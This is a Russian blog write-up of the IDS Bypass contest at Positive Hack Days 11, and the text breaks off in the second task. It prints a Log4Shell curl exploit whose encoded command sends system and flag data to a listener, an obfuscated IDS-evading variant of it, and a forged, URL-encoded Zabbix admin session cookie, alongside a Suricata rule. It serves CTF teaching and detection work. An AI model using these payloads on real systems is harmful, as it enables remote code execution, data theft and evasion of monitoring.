{"id":333912,"date":"2022-06-01T15:00:14","date_gmt":"2022-06-01T15:00:14","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=333912"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=333912","title":{"rendered":"<span>\u0420\u0430\u0437\u0431\u043e\u0440 \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u0430 IDS Bypass \u043d\u0430 Positive Hack Days 11<\/span>"},"content":{"rendered":"<div><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w780q1\/getpro\/habr\/upload_files\/baf\/ed4\/6dc\/bafed46dc5b0d62d907291f46da87377.jpeg\" alt=\"\u043a\u043e\u043d\u043a\u0443\u0440\u0441 IDS Bypass \u043d\u0430 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 Positive Hack Days 11\" title=\"\u043a\u043e\u043d\u043a\u0443\u0440\u0441 IDS Bypass \u043d\u0430 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 Positive Hack Days 11\" width=\"2560\" height=\"1275\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/baf\/ed4\/6dc\/bafed46dc5b0d62d907291f46da87377.jpeg\" data-blurred=\"true\"\/><figcaption>\u043a\u043e\u043d\u043a\u0443\u0440\u0441 IDS Bypass \u043d\u0430 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 Positive Hack Days 11<\/figcaption><\/figure>\n<p>\u041a\u043e\u043d\u043a\u0443\u0440\u0441 IDS Bypass \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b \u043d\u0430 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 Positive Hack Days \u0443\u0436\u0435 \u0432 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u044b\u0439 \u0440\u0430\u0437 (<a href=\"https:\/\/habr.com\/ru\/company\/pt\/blog\/569168\/\">\u0440\u0430\u0437\u0431\u043e\u0440 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u043f\u0440\u043e\u0448\u043b\u044b\u0445 \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u043e\u0432<\/a>). \u0412 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u043c\u044b \u0441\u0434\u0435\u043b\u0430\u043b\u0438 \u0448\u0435\u0441\u0442\u044c \u0438\u0433\u0440\u043e\u0432\u044b\u0445 \u0443\u0437\u043b\u043e\u0432 \u0441 \u0444\u043b\u0430\u0433\u043e\u043c \u043d\u0430 \u043a\u0430\u0436\u0434\u043e\u043c. \u0414\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0444\u043b\u0430\u0433\u0430 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u043b\u0438\u0431\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435, \u043b\u0438\u0431\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0434\u0440\u0443\u0433\u043e\u0435 \u0443\u0441\u043b\u043e\u0432\u0438\u0435, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u043f\u0435\u0440\u0435\u0431\u0440\u0430\u0442\u044c \u0441\u043f\u0438\u0441\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435. <\/p>\n<p>\u0421\u0430\u043c\u0438 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u044b\u043b\u0438 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u044b\u043c\u0438. \u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u043b \u043e\u0431\u0445\u043e\u0434 IDS: \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0438\u043d\u0441\u043f\u0435\u043a\u0442\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0442\u0440\u0430\u0444\u0438\u043a \u043e\u0442 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0438\u043b\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0449\u0443\u0442 \u0430\u0442\u0430\u043a\u0438. \u0415\u0441\u043b\u0438 \u0442\u0430\u043a\u043e\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442, \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0438 \u0431\u043e\u0442 \u043f\u0440\u0438\u0441\u044b\u043b\u0430\u0435\u0442 \u0435\u043c\u0443 \u0442\u0435\u043a\u0441\u0442 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0432\u0448\u0435\u0433\u043e \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0432 \u0422\u0435\u043b\u0435\u0433\u0440\u0430\u043c. <\/p>\n<p>\u0418 \u0434\u0430, \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u043c\u044b \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b\u0438 \u0443\u0439\u0442\u0438 \u043e\u0442 \u043f\u0440\u0438\u0432\u044b\u0447\u043d\u044b\u0445 CTFd \u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 IDS \u0432 \u0441\u0442\u043e\u0440\u043e\u043d\u0443 \u0431\u043e\u043b\u0435\u0435 \u0443\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u043c-\u0431\u043e\u0442\u0430. \u0414\u043b\u044f \u0443\u0447\u0430\u0441\u0442\u0438\u044f \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0431\u044b\u043b\u043e \u0432\u0441\u0435\u0433\u043e \u043b\u0438\u0448\u044c \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0431\u043e\u0442\u0443 \u0438 \u0432\u044b\u0431\u0440\u0430\u0442\u044c \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0417\u0430\u0442\u0435\u043c \u043e\u043d \u043f\u0440\u0438\u0441\u044b\u043b\u0430\u043b OVPN-\u0444\u0430\u0439\u043b \u0434\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043a \u0438\u0433\u0440\u043e\u0432\u043e\u0439 \u0441\u0435\u0442\u0438, \u0438 \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u0432\u0441\u0435 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 (\u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 \u0438 \u0438\u0433\u0440\u043e\u0432\u043e\u0433\u043e \u0434\u0430\u0448\u0431\u043e\u0440\u0434\u0430, \u0441\u0434\u0430\u0447\u0430 \u0444\u043b\u0430\u0433\u043e\u0432) \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u043b\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u0431\u043e\u0442\u0430. \u042d\u0442\u043e\u0442 \u043f\u043e\u0434\u0445\u043e\u0434 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b \u0441\u0435\u0431\u044f \u043d\u0430 100%! <\/p>\n<p>\u0412\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u0430 \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0430 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f. \u041d\u0430 \u0441\u0442\u0435\u043d\u0434\u0435 \u0441\u0442\u043e\u044f\u043b\u043e \u0441\u0435\u043c\u044c \u042d\u041b\u0422-\u0442\u0435\u043b\u0435\u0432\u0438\u0437\u043e\u0440\u043e\u0432: \u043f\u043e \u0442\u0435\u043b\u0435\u0432\u0438\u0437\u043e\u0440\u0443 \u043d\u0430 \u043a\u0430\u0436\u0434\u043e\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0438 \u043e\u0434\u0438\u043d \u0434\u043b\u044f \u043e\u0431\u0449\u0435\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438. \u041d\u0430 \u044d\u043a\u0440\u0430\u043d\u044b \u0432\u044b\u0432\u043e\u0434\u0438\u043b\u0438\u0441\u044c \u0434\u0430\u0448\u0431\u043e\u0440\u0434, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0447\u0438\u0441\u043b\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 \u0438 \u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0435 \u0432\u0437\u043b\u043e\u043c\u043e\u0432 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432. <\/p>\n<p>\u0427\u0438\u0441\u043b\u043e \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u0431\u044b\u043b\u043e \u0440\u0435\u043a\u043e\u0440\u0434\u043d\u044b\u043c. \u041e\u0442\u0447\u0430\u0441\u0442\u0438 \u044d\u0442\u043e\u043c\u0443 \u0441\u043f\u043e\u0441\u043e\u0431\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u043e \u0438 \u0442\u043e, \u0447\u0442\u043e IDS Bypass \u0431\u044b\u043b \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043b\u044e\u0431\u043e\u043c\u0443 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043e\u043d\u043b\u0430\u0439\u043d \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u043b\u0441\u044f \u043d\u043e\u0447\u044c\u044e: \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u0430 \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u0442\u0430\u0431\u043b\u043e \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u043e 101 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430, \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u044c \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0440\u0435\u0448\u0438\u043b\u0438 \u0445\u043e\u0442\u044f \u0431\u044b \u043e\u0434\u043d\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0435. \u0412 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 IDS Bypass \u0434\u043b\u0438\u043b\u0441\u044f \u043f\u043e\u0447\u0442\u0438 30 \u0447\u0430\u0441\u043e\u0432.<\/p>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u043f\u0435\u0440\u0435\u0439\u0434\u0435\u043c \u043a \u0440\u0430\u0437\u0431\u043e\u0440\u0443 \u0437\u0430\u0434\u0430\u043d\u0438\u0439.<\/p>\n<h3>\u0417\u0430\u0434\u0430\u043d\u0438\u0435 1: Log4j (20 \u043e\u0447\u043a\u043e\u0432)<\/h3>\n<figure class=\"\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/717\/49a\/e36\/71749ae36667ca3e9c17a100f21c1e58.png\" width=\"447\" height=\"82\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/717\/49a\/e36\/71749ae36667ca3e9c17a100f21c1e58.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0421\u0442\u043e\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 20 \u043e\u0447\u043a\u043e\u0432, \u043d\u043e \u0443\u043c\u0435\u043d\u044c\u0448\u0430\u043b\u0430\u0441\u044c \u043d\u0430 \u043e\u0434\u043d\u043e \u043e\u0447\u043a\u043e \u0437\u0430 \u043a\u0430\u0436\u0434\u043e\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u0435. \u0418\u0437 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0431\u044b\u043b\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u0432 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 log4j. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f <a href=\"https:\/\/github.com\/christophetd\/log4shell-vulnerable-app\">\u0434\u043e\u043a\u0435\u0440-\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440<\/a>. \u0422\u0443\u0442 \u0436\u0435 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442:<\/p>\n<pre><code>curl -v http:\/\/10.0.0.10:8080 -H 'X-Api-Version: ${jndi:ldap:\/\/10.8.0.18:1389\/Basic\/Command\/Base64\/d2dldCBodHRwOi8vMTAuOC4wLjE4OjQ0NDQgLS11c2VyLWFnZW50PSIkKHB3ZDsgbHMgLWxhOyBpZmNvbmZpZyki}'<\/code><\/pre>\n<p>\u0422\u0430\u043a\u0443\u044e \u0430\u0442\u0430\u043a\u0443 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u0442 IDS, \u0438 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u0432\u0438\u0434\u0438\u0442, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435:<\/p>\n<p><code>ATTACK [PTsecurity] log4j RCE aka Log4Shell TCP attempt (CVE-2021-44228)<\/code><\/p>\n<p>\u041d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043c\u0435\u0441\u044f\u0446\u0435\u0432 \u043d\u0430\u0437\u0430\u0434, \u0432\u0441\u043a\u043e\u0440\u0435 \u043f\u043e\u0441\u043b\u0435 \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0434\u043b\u044f Log4Shell, \u0441\u0442\u0430\u043b\u0438 \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0435\u0433\u043e \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u044b \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 WAF \u0438 IDS. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, <a href=\"https:\/\/github.com\/34zY\/JNDI-Exploit-1.2-log4shell\">\u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u043d\u0430 GitHub<\/a> \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d \u0442\u043e\u0442 \u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043d\u043e \u0441 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0435\u0439 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0445 \u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u0439. \u0418\u0442\u043e\u0433\u043e\u0432\u044b\u0439 \u0437\u0430\u043f\u0440\u043e\u0441, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438 \u043e\u0431\u0445\u043e\u0434\u0438\u0442 IDS, \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0442\u0430\u043a\u0438\u043c:<\/p>\n<pre><code>curl -v http:\/\/10.0.0.10:8080 -H 'X-Api-Version: ${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:\/}\/10.8.0.26:1389\/Basic\/Command\/Base64\/d2dldCBodHRwOi8vMTAuOC4wLjI2OjQ0NDQgLS11c2VyLWFnZW50PSIkKGxzIC1sYSAvOyBjYXQgL2ZsYWcpIg==}'<\/code><\/pre>\n<p>\u041e\u0442\u0434\u0430\u0432 \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0438 \u043f\u0440\u0438\u043d\u044f\u0432 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u043a \u043f\u043e\u0440\u0442\u0443 4444, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u043b\u0430\u0433: flag{L0g_FOR_Wh4t?}<\/p>\n<h3>\u0417\u0430\u0434\u0430\u043d\u0438\u0435 2: Zabbix (20 \u043e\u0447\u043a\u043e\u0432)<\/h3>\n<figure class=\"\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2e7\/916\/37b\/2e791637bc01a9caa8021437dea75114.png\" width=\"448\" height=\"98\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/2e7\/916\/37b\/2e791637bc01a9caa8021437dea75114.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041e\u0434\u043d\u0430 \u0438\u0437 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 Zabbix \u2014 <a href=\"https:\/\/blog.sonarsource.com\/zabbix-case-study-of-unsafe-session-storage\/\">CVE-2022-23131<\/a>. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 SSO \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0434\u043c\u0435\u043d\u0438\u0442\u044c \u043a\u0443\u043a\u0438 \u0438 \u0432\u043e\u0439\u0442\u0438 \u0432 Zabbix \u0431\u0435\u0437 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0441 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u044c\u044e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430. \u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 <a href=\"https:\/\/github.com\/Mr-xn\/cve-2022-23131\">\u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d \u043d\u0430 GitHub<\/a>, \u0438 \u043e\u043d \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u0434\u043d\u0438\u043c \u0438\u0437 \u0442\u0440\u0435\u0445 IDS-\u043f\u0440\u0430\u0432\u0438\u043b:<\/p>\n<ul>\n<li>\n<p><code>ET EXPLOIT Zabbix v5.4.0 - 5.4.8 SSO\/SALM Auth Bypass (CVE-2022-23131) M1<\/code><\/p>\n<\/li>\n<li>\n<p><code>ET EXPLOIT Zabbix v5.4.0 - 5.4.8 SSO\/SALM Auth Bypass (CVE-2022-23131) M2<\/code><\/p>\n<\/li>\n<li>\n<p><code>ET EXPLOIT Zabbix v5.4.0 - 5.4.8 SSO\/SALM Auth Bypass (CVE-2022-23131) M3<\/code><\/p>\n<\/li>\n<\/ul>\n<p>\u042d\u0442\u0438 \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043e\u0442\u043a\u0440\u044b\u0442\u044b \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0434\u043b\u044f \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u044f. \u0420\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0442\u0441\u044f \u043e\u043d\u0438 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 <a href=\"https:\/\/rules.emergingthreats.net\/open\/suricata-5.0\/emerging-all.rules\">ET Open Ruleset<\/a>. \u0412\u043e\u0442, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043a\u0430\u043a \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043f\u0435\u0440\u0432\u043e\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u043e:<\/p>\n<pre><code>alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT Zabbix v5.4.0 - 5.4.8 SSO\/SALM Auth Bypass (CVE-2022-23131) M1\"; flow:established,to_server; http.uri; content:\"\/index_sso.php\"; startswith; http.cookie; content:\"zbx_session=\"; content:\"InVzZXJuYW1lX2F0dHJpYnV0ZSI6\"; distance:0; fast_pattern; pcre:\"\/(?:InNhbWxfZGF0YS|JzYW1sX2RhdGEi|ic2FtbF9kYXRhI)\/\"; reference:url,blog.sonarsource.com\/zabbix-case-study-of-unsafe-session-storage; reference:cve,2022-23131; classtype:trojan-activity; sid:2035371; rev:2; metadata:attack_target Server, created_at 2022_03_02, cve CVE_2022_23131, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2022_03_02;)<\/code><\/pre>\n<p>\u041c\u043d\u043e\u0433\u0438\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c <a href=\"https:\/\/github.com\/Mr-xn\/cve-2022-23131\/blob\/main\/zabbix_session_exp.py\">\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c<\/a>. \u0415\u0441\u043b\u0438 \u0440\u0430\u0441\u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u043d\u0435\u043c \u0441\u0442\u0440\u043e\u043a\u0443 62, \u0442\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0432\u044b\u0432\u043e\u0434\u0438\u043b \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043a\u0443\u043a\u0438 zbx_session, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0437\u0430\u0434\u0430\u0442\u044c \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435:<\/p>\n<pre><code>Cookie: zbx_session= eyJzYW1sX2RhdGEiOiB7InVzZXJuYW1lX2F0dHJpYnV0ZSI6ICJBZG1pbiJ9LCAic2Vzc2lvbmlkIjogImZkYmQ2Y2JiYmIyMTEzM2RmNDM3NmU0YzRhZjc0OTIwIiwgInNpZ24iOiAiRENoZHZWUHBubEZBMEpqVFVDV2lHWkZaZWZ6OU1MMnlxTlpubzVPUkRQeDJDaGhiN0hOVWV1VjRPN2QwYWY5T2d5b09ONjhPYmdOWkgzMGhnV1c3NlE9PSJ9<\/code><\/pre>\n<p>\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u043b \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u043f\u0430\u043d\u0435\u043b\u044c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 Zabbix. \u041d\u043e \u043f\u0440\u043e\u0434\u0435\u043b\u0430\u0432 \u044d\u0442\u043e\u0442 \u043f\u0443\u0442\u044c, \u043e\u043d \u043f\u043e\u043b\u0443\u0447\u0430\u043b \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u0435 \u043e\u0442 IDS:<\/p>\n<p><code>ET EXPLOIT Zabbix v5.4.0 - 5.4.8 SSO\/SALM Auth Bypass (CVE-2022-23131) M1<\/code><\/p>\n<p>\u0427\u0442\u043e\u0431\u044b \u043e\u0431\u043e\u0439\u0442\u0438 IDS, \u043c\u043d\u043e\u0433\u0438\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043a\u0443\u043a\u0438 zbx_session \u0432 URL encoding:<\/p>\n<pre><code>Cookie: zbx_session= %65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%69%42%37%49%6e%56%7a%5a%58%4a%75%59%57%31%6c%58%32%46%30%64%48%4a%70%59%6e%56%30%5a%53%49%36%49%43%4a%42%5a%47%31%70%62%69%4a%39%4c%43%41%69%63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%67%49%6d%5a%6b%59%6d%51%32%59%32%4a%69%59%6d%49%79%4d%54%45%7a%4d%32%52%6d%4e%44%4d%33%4e%6d%55%30%59%7a%52%68%5a%6a%63%30%4f%54%49%77%49%69%77%67%49%6e%4e%70%5a%32%34%69%4f%69%41%69%52%45%4e%6f%5a%48%5a%57%55%48%42%75%62%45%5a%42%4d%45%70%71%56%46%56%44%56%32%6c%48%57%6b%5a%61%5a%57%5a%36%4f%55%31%4d%4d%6e%6c%78%54%6c%70%75%62%7a%56%50%55%6b%52%51%65%44%4a%44%61%47%68%69%4e%30%68%4f%56%57%56%31%56%6a%52%50%4e%32%51%77%59%57%59%35%54%32%64%35%62%30%39%4f%4e%6a%68%50%59%6d%64%4f%57%6b%67%7a%4d%47%68%6e%56%31%63%33%4e%6c%45%39%50%53%4a%39<\/code><\/pre>\n<p>\u042d\u0442\u043e \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u044b\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043d\u0430 IDS Bypass \u043c\u043e\u0433\u0443\u0442 \u0438\u043c\u0435\u0442\u044c 